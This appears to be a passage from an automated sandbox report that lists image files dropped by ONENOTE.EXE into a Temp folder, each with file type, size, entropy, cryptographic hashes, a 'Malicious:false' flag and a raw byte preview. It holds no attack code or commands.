                                                                                                                                                                                                                  Preview:./.C..vL....W"v_"N...%G...]...G................?.....I...............................................................................................................h.............................................H...BI.N..J..........:a..~..L.r..`.3..............................7...7...7...7..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{964CFC3D-F97B-49A4-B185-745A2B6A21DE}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):11886
                                                                                                                                                                                                                  Entropy (8bit):7.946442244439929
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
                                                                                                                                                                                                                  MD5:875CFB3B5C3619253223731E8C9879E5
                                                                                                                                                                                                                  SHA1:6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
                                                                                                                                                                                                                  SHA-256:CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
                                                                                                                                                                                                                  SHA-512:47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s|.....C.$@.$.....t.!........8......RR....<...6..P||....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z*.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e...*..UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ)*.(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....|g*..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{9726D7F8-801D-4BD8-89BA-689D6E34BD16}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2232
                                                                                                                                                                                                                  Entropy (8bit):7.837610270261933
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                                                                                                                                  MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                                                                                                                                  SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                                                                                                                                  SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                                                                                                                                  SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...*........A..!.A.....R.Ai%YH..(M.".h.cf*.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V*...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8..*.X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o|%..7..'.....N.|..Vi...q..uO,`/....\W{..y...&iI..|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.|....8..H......_...G...|......;6YQ|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{97AA1A11-8BF9-40DD-9A19-7F147E6B938E}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):17289
                                                                                                                                                                                                                  Entropy (8bit):7.962998633267186
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
                                                                                                                                                                                                                  MD5:708E8EB906BC105CCA0535AE669AA651
                                                                                                                                                                                                                  SHA1:38D82DEDFE97D3001188C2E18FE13BD741FD520F
                                                                                                                                                                                                                  SHA-256:1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
                                                                                                                                                                                                                  SHA-512:1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w*.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }*...B@....i<8.....B@.T2 .........xp..! .....d@...!......(*B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.*&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{9854AD86-2FAE-4AF1-9581-519D6F73E39F}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):11332
                                                                                                                                                                                                                  Entropy (8bit):7.9324721568775285
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
                                                                                                                                                                                                                  MD5:31579CA3352DF8FA4E3E7F48C7CDF672
                                                                                                                                                                                                                  SHA1:AA682A3C781BF8EE43B5EDC9718E64CB79135F25
                                                                                                                                                                                                                  SHA-256:B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
                                                                                                                                                                                                                  SHA-512:782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b*. &M.d-e.*.. ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...|....7...b...|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..|..[..g%(h.....W...?...UDh..T$..?....|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{9AA27895-B4D1-4431-B6D8-905E53828BBC}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:10:32], progressive, precision 8, 594x773, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):242903
                                                                                                                                                                                                                  Entropy (8bit):7.944495275553473
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6144:YVxOYlZX2kCWfYoFMXC/sBFC9r+4iEGM4rrcPoWmwkU6FJ:+OwZ2kbFMC/L99ifvokU6/
                                                                                                                                                                                                                  MD5:C594A4AA7234EF91E6C2714CFE1410F1
                                                                                                                                                                                                                  SHA1:C0F720D4CE3196852814D0B7347F0CAA0C6FD526
                                                                                                                                                                                                                  SHA-256:10C833E47BE1C8496F949A6B059C2D79212A4DD66BDE62116EA337FA4FE0B654
                                                                                                                                                                                                                  SHA-512:7313F6545A334F9E2DE5430B2DB5C419C4C8A40E075338DAFCD74970BCC6309786946E5DFB57531612BF4C6269495655706D920FD99922FDACFF9796710DA9C0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:10:32.............................R.......................................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................{.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...v&.F;-v;}FH..Z...N..)Y.......h;C....G.0W..ww...MI..Z+..\.........c..4.1.~.Yo.Y6.&. q...............l.A#.~s?yYg..7ky...r

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{9EB02E9B-64AE-4C21-BE45-13038967758E}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):14458
                                                                                                                                                                                                                  Entropy (8bit):7.944094738048628
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                                                                                                                                  MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                                                                                                                                  SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                                                                                                                                  SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                                                                                                                                  SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...d*U..*.C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{9ED8511A-975A-4476-B434-16AF579EC9AC}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):136726
                                                                                                                                                                                                                  Entropy (8bit):7.973487854173386
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3072:SIXmy5Tl704vW2ZKkvV8UU0ZWUF0BJwySIdgz816YzDc1+opecYPn:Sny5Tl704fZFV8UU6LGXwyS4xohpQPn
                                                                                                                                                                                                                  MD5:4A2472AC2A9434E35701362D1C56EDDF
                                                                                                                                                                                                                  SHA1:16FA2EA2D2808D75445896E03B67A93000EEDDD8
                                                                                                                                                                                                                  SHA-256:505F731CB7707EFAB2EB06685B392DC7E59265A40B55AAE43E5DC15C0A86CBA4
                                                                                                                                                                                                                  SHA-512:5E28D8FB2AC62ED270968072A30013334461F7CAE96058AF9EAA6E10912989DC47112D2133892BF61F7A516B77C6FF71BA2A000B750A9F95C787E538B09595C2
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!1..AQaq".....2B....R#..b3...r...C$...X.....Sc...9.%'.(Hs4Dgw..T..5GW.x.)......................!.1..AQa"2.q.......B..#c........b6.Rr.3s$.&..S...C4.%5............?.........(......(......(......(......(......(......(......(.G/.GE&...)..P.x..B.({i2Y;.z?G...Yfc.)H..^....#.....}3..Sc^.H..+...M.a.P.....GS.....H_.3..<....1f........1.<.\..nn-..s.s.\9Y....=.......S.0.......N..cA..Io..r.3..........ay.....K.....,.;9..Q......xO.Fa.2..>........{4k.....|....?U....3.8..._/3....#.. t.y......yY.......e.<........#.....B.....Z.%.Y..S.ye.W4...l.......X...%.@y}>....l.yi..D..W......L..._D.Q....)...E....n.%...*..K.4#.8`..I....h..h.o..I......-...hB...3..u.(5..........n...,.@....a.t.9.....@.s.>.&...@

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{9F28B94D-5114-46BC-A7E3-53E875E67288}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 85 x 470, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):11197
                                                                                                                                                                                                                  Entropy (8bit):7.975073010774664
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:p9wNdtRKcVHso6zsqm06xaqZdingVzLZ7/PGSIz/yycRTbChh/JzhbEx15RGb:mdtMcVHqgAqTinMzLZ7/uSIz/yTR/mhF
                                                                                                                                                                                                                  MD5:DDC3CC30794277500EFE4BC6667EC123
                                                                                                                                                                                                                  SHA1:EFC9642C1F95B5FC38764476AE481649C016FA0C
                                                                                                                                                                                                                  SHA-256:7F5B660A1A0BF46C75AAF19B4F77A0E086DE003EC03AFC1F58D871D55AA5BA9E
                                                                                                                                                                                                                  SHA-512:25232A84604C3959634D33090238FEC8D51E40AD84EB3A08BB8522A81BE1E83378649C014E98E1DFCDF46B7BFAC92D8D2429211CD11D7EE0334C9C3DF7C1B6A6
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...U.........1x5.....PLTE....................................e........................................................s...............x..........................o..............................................................................................................................................................~.............................m...............................................j...............................................p.......z......................................................x..............|........................................v.......................y..........................................................h...........................................................................P..{....bKGD....H....cmPPJCmp0712....H.s...(SIDATx^.}i@S..N....h...!..)....AI%..p.L."a..)..`U..,h..:O.b.:.j+.Z).b..zN.s..{O...&|..N}...${....~.....k}.[k}{.o^.D_..W:35ly..7rL....6n0.A...b

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{9F5A63BA-6A3D-4C93-B5BC-14DE54FCF24F}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2270
                                                                                                                                                                                                                  Entropy (8bit):7.845368393313232
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
                                                                                                                                                                                                                  MD5:6EFE6733E10E011FFDD6711B5F37C9E2
                                                                                                                                                                                                                  SHA1:C72549E824EAD899944A38C46FBC28BDCDAAD611
                                                                                                                                                                                                                  SHA-256:92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
                                                                                                                                                                                                                  SHA-512:EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W...*.F......@.*.(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!*.&E.....n...=.@..Sp.GF..c*....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~l*k.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N*..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{A122454F-2933-4403-8796-ABD2E1DE70CD}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{A18E55E9-ADF9-43CB-9989-05600570D3F9}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):16003
                                                                                                                                                                                                                  Entropy (8bit):7.959532793770661
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
                                                                                                                                                                                                                  MD5:3A5CD52E925A7C4A345047D8F06C3C41
                                                                                                                                                                                                                  SHA1:9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
                                                                                                                                                                                                                  SHA-256:477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
                                                                                                                                                                                                                  SHA-512:8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..|.....+)..H..C.K... ....x).rU..T..*E...;....*.@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z*.GJ...."@zJ}...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[||...t.T.w *.. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{A1FD471C-3B90-4CEA-9E1F-C7FFD5C74C8E}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):19235
                                                                                                                                                                                                                  Entropy (8bit):7.944867159042578
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                                                                                                                                  MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                                                                                                                                  SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                                                                                                                                  SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                                                                                                                                  SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.*!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=|z7.Z.|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'*..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.*u.j..S.C=...|.....2..(YF........|...*.7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{A4363DA2-9E64-4EC9-AB26-93A115DB893B}

                                                                                                                                                                                                                  Download File
